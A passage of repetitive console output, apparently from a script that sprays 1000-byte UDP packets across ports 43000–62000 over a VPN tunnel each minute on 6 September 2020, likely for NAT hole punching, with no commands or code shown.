size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:27:05 -Starting port fill at 2020-09-06 09:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:28:06 -Starting port fill at 2020-09-06 09:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:29:05 -Starting port fill at 2020-09-06 09:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:30:06 -Starting port fill at 2020-09-06 09:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:31:07 -Starting port fill at 2020-09-06 09:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:32:07 -Starting port fill at 2020-09-06 09:33:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:33:07 -Starting port fill at 2020-09-06 09:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:34:05 -Starting port fill at 2020-09-06 09:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:35:06 -Starting port fill at 2020-09-06 09:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:36:04 -Starting port fill at 2020-09-06 09:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:37:06 -Starting port fill at 2020-09-06 09:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:38:05 -Starting port fill at 2020-09-06 09:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:39:05 -Starting port fill at 2020-09-06 09:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:40:04 -Starting port fill at 2020-09-06 09:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:41:05 -Starting port fill at 2020-09-06 09:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:42:06 -Starting port fill at 2020-09-06 09:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:43:06 -Starting port fill at 2020-09-06 09:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:44:04 -Starting port fill at 2020-09-06 09:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:45:04 -Starting port fill at 2020-09-06 09:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:46:04 -Starting port fill at 2020-09-06 09:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:47:05 -Starting port fill at 2020-09-06 09:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:48:07 -Starting port fill at 2020-09-06 09:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:49:05 -Starting port fill at 2020-09-06 09:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 